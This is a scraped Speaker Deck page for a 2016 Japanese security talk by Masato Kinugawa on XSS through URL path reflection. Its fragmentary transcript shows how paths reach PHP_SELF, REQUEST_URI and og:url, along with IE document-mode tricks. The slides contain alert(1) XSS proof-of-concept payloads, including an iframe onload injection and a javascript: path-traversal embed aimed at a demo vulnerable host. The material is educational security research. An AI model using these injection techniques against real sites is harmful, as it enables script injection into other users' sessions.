Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Speaker Deck
PRO
Sign in
Sign up for free
明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7
Masato Kinugawa
March 29, 2016
Technology
14
24k
明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7
Shibuya.XSS techtalk #7 の資料です。
Masato Kinugawa
March 29, 2016
Tweet
Share
More Decks by Masato Kinugawa
See All by Masato Kinugawa
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
21
5.8k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
83k
Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)
masatokinugawa
9
18k
バグハンターが見てきたBug Bountyの7年 / LINE Developer Meetup #34 Security Bug Bounty
masatokinugawa
18
11k
5文字で書くJavaScript/ Shibuya.XSS techtalk #10
masatokinugawa
35
19k
ブラウザのUIのバグを探す / Secusoba PopUnder
masatokinugawa
2
1.6k
攻撃者視点で見る Service Worker / PWA Study SW
masatokinugawa
20
24k
USAGE OF XSS FILTER
masatokinugawa
4
2.4k
XSSフィルターの使い方/ Shibuya.XSS techtalk #9
masatokinugawa
7
2.6k
Other Decks in Technology
See All in Technology
OpenShift.Run2023_create-aro-with-terraform
ishiitaiki20fixer
1
160
re:Inventで発表があったIoT事例の紹介と考察
kizawa2020
0
150
Kaggleシミュレーションコンペの動向
nagiss
0
230
Astroで始める爆速個人サイト開発
takanorip
12
8.4k
400種類のWeb APIをサポートしているデータパイプラインツールにおけるWeb APIとの共存戦略
cdataj
0
150
Airdrop for Open Source Projects
epicsdao
0
290
OCI DevOps 概要 / OCI DevOps overview
oracle4engineer
PRO
0
470
Hasuraの本番運用に向けて
nori3tsu
0
280
PHPのimmutable arrayとは
hnw
1
140
プログラミング支援AI GitHub Copilot すごいの話
moyashi
0
280
OVN-Kubernetes-Introduction-ja-2023-01-27.pdf
orimanabu
1
230
USB PD で迎える AC アダプター大統一時代
puhitaku
2
1.5k
Featured
See All Featured
jQuery: Nuts, Bolts and Bling
dougneiner
57
6.6k
How to Ace a Technical Interview
jacobian
270
21k
A Modern Web Designer's Workflow
chriscoyier
689
180k
The Invisible Customer
myddelton
113
12k
How to name files
jennybc
47
73k
Reflections from 52 weeks, 52 projects
jeffersonlam
338
18k
Building Flexible Design Systems
yeseniaperezcruz
314
35k
Documentation Writing (for coders)
carmenintech
51
2.9k
The Straight Up "How To Draw Better" Workshop
denniskardys
226
130k
From Idea to $5000 a Month in 5 Months
shpigford
374
44k
Making Projects Easy
brettharned
102
4.8k
Designing with Data
zakiwarfel
91
4.2k
Transcript
None
None
None
None
None
https://host/tags/aaa/ ... </head> <body> <form> <input type="text" value="aaa"> ...
... </head> <meta property="og:url" content="https://host/path/index"> <body> ... https://host/path/index?p=1
... </head> <meta property="og:url" content="https://host/path/index;aaa"> <body> ... https://host/path/index;aaa?p=1
None
http://php.net/index.php http://php.net/index.php/xxx/yyy/zzz
http://shibuyaxss.connpass.com/event/28232/ http://shibuyaxss.connpass.com/event/28232/;abc
None
SCRIPT_URL /test.php/<b>PATH</b> SCRIPT_URI http://localhost/test.php/<b>PATH</b> PATH_INFO /<b>PATH</b> PATH_TRANSLATED \<b>PATH<\b> PHP_SELF /test.php/<b>PATH</b>
GET /path?query HTTP/1.1 http://php.net/manual/ja/reserved.variables.server.php
/test.php/<b>PATH</b>?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY% 3C/b%3E HTTP/1.1 QUERY_STRING %3Cb%3EQUERY%3C/b%3E REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E? %3Cb%3EQUERY%3C/b%3E
http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>
/test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> HTTP/1.1 QUERY_STRING <b>QUERY</b> REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>
http://localhost/test.php/<b>PATH</b> GET /test.php/<b>PATH</b> HTTP/1.1
/test.php/%3Cb%3EPATH%3C/b%3E GET /test.php/<b>PATH</b> HTTP/1.1 REQUEST_URI /test.php/<b>PATH</b> location.pathname /test.php/%3Cb%3EPATH%3C/b%3E http://localhost/test.php/<b>PATH</b>
None
None
None
None
None
None
None
None
None
None
None
None
None
None
None
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=9 <head> <meta
http-equiv="X-UA-Compatible" content="IE=9"> </head>
<svg> <circle cx="100" cy="100" r="50" fill="red"/> </svg>
ifr=document.createElement('<iframe onload=alert(1)>'); document.body.appendChild(ifr); InvalidCharacterError
<meta http-equiv="X-UA-Compatible" content="IE=9"> <script> console.log(document.documentMode) /* 9 */ </script> <iframe
src=//victim/></iframe> http://blogs.msdn.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components- weblogfiles/00-00-01-35-07/3073.IE_5F00_chart_5F00_jp.pdf
<meta http-equiv="X-UA-Compatible" content="IE=9"> <embed src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/% 2F..%2F..%2Fjizen2#hash"></embed>
<script src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js"> </script>
None
None
None
None
None
None
None
None
None
None
None
None
None